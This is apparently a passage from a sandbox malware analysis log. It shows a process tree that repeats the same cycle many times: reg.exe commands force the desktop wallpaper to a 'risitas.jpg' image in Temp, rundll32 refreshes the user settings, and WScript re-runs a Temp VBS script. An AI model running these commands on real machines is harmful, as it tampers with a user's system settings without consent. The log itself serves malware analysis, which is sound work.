        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:5240
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:5252
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:5268
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:5280
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"
        5⤵
        
        PID:5296
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:5312
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:5336
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:5348
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:5360
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:5372
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"
        5⤵
        
        PID:5388
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:5400
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:5420
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:5440
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:5452
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:5464
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"
        5⤵
        
        PID:5480
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:5488
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:5512
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:5536
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:5548
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:5560
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"
        5⤵
        
        PID:5576
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:5592
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:5604
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:5620
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:5640
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:5656
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"
        5⤵
        
        PID:5672
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:5680
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:5712
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:5724
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:5736
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:5748
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"
        5⤵
        
        PID:5764
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:5780
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:5808
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:5820
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:5832
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:5848
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"
        5⤵
        
        PID:5864
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:5880
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:5908
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:5920
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:5936
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:5948
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"
        5⤵
        
        PID:5964
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:5984
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:6004
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:6020
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:6032
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:6044
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"
        5⤵
        
        PID:6060
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:6080
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:6100
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:6116
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:6128
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:5128
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"
        5⤵
        
        PID:5152
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:5160
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:5188
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:5184
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:5216
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:5256
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"
        5⤵
        
        PID:5272
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:5292
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:5340
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:5352
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:5364
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:5384
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"
        5⤵
        
        PID:5412
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:5436
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:5452
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:5464
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:5488
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:5528
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"
        5⤵
        
        PID:5552
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:5572
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:5608
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:5636
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:5648
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:5664
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"
        5⤵
        
        PID:5680
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:5720
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:5752
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:5748
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:5800
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:5816
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"
        5⤵
        
        PID:5820
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:5832
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:5904
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:5912
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:5932
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:5920
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"
        5⤵
        
        PID:5952
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:6000
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:6004
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:6020
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:6032
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:6052
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"
        5⤵
        
        PID:6080
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:6116
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:6136
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:5140
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:5128
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:5196
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"
        5⤵
        
        PID:5224
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:5244
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:4920
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:5288
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:5344
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:5356
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"
        5⤵
        
        PID:5376
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:5404
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:5468
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:5452
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:5464
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:5488
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"
        5⤵
        
        PID:5528
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:5572
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:5644
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:5660
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:5700
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:5712
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"
        5⤵
        
        PID:5756
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:5800
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:5816
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:5832
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:5916
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:5924
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"
        5⤵
        
        PID:5936
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:6008
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:6040
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:6056
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:6088
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:6132
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"
        5⤵
        
        PID:436
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:5140
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:5220
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:5248
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:1684
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:5316
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"
        5⤵
        
        PID:5340
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:5356
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:5472
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:5504
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:5532
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:5540
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"
        5⤵
        
        PID:5604
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:5660
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:5700
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:5720
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:5828
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:5832
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"
        5⤵
        
        PID:6008
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:2500
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:5140
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:5220
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:5248
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:5336
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"
        5⤵
        
        PID:5472
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:5464
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:5540
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:5724
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:5712
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:692
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"
        5⤵
        
        PID:3916
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:5824
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:5908
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:1608
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:6088
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:228
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"
        5⤵
        
        PID:5140
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:5244
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:3116
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:1484
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:5464
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:5664
